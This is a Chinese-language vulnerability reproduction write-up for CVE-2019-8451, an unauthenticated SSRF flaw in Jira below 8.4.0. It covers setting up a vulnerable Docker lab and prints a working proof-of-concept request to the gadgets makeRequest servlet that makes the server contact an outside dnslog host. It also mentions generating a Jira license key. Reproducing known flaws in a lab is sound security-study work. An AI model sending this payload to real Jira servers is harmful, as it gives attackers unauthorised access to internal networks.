您好,登錄后才能下訂單哦!
這期內容當中小編將會給大家帶來有關Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
0x00 簡介
JIRA是Atlassian公司出品的項目與事務跟蹤工具,被廣泛應用于缺陷跟蹤、客戶服務、需求收集、流程審批、任務跟蹤、項目跟蹤和敏捷管理等工作領域。
0x01 漏洞概述
Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞,原因在于JiraWhitelist這個類的邏輯缺陷,成功利用此漏洞的遠程攻擊者可以以Jira服務端的身份訪問內網資源。經分析,此漏洞無需任何憑據即可觸發。(來自奇安信CERT)
0x02 影響范圍
Jira < 8.4.0
0x03 環境搭建
在線靶場
開放時間(當前-9月29日20:00)
獲取方式(完成任意一個):
1、將本文轉發至朋友圈并配文字,截圖發至公眾號內
2、聯系作者,五元紅包
自行搭建
使用docker進行搭建,執行以下命令開啟環境
docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
訪問ip:8080進行安裝
下圖選擇第二個
繼續即可
點擊next,后面漏了兩張圖
去生成JIRA使用許可證
生成之后找到License Key,回到頁面填上License Key繼續安裝
至此,安裝完畢。
0x04 漏洞利用
先訪問ip:8080,然后刷新抓包
將數據包替換為如下Poc:
GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2
其中ip替換為目標ip,共三處
@后面改為你的dnslog的地址
repeater發包
去dnslog中刷新查看結果,可以看到有流量經過
如果訪問未開放端口,結果是這樣的:
上述就是小編為大家分享的Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。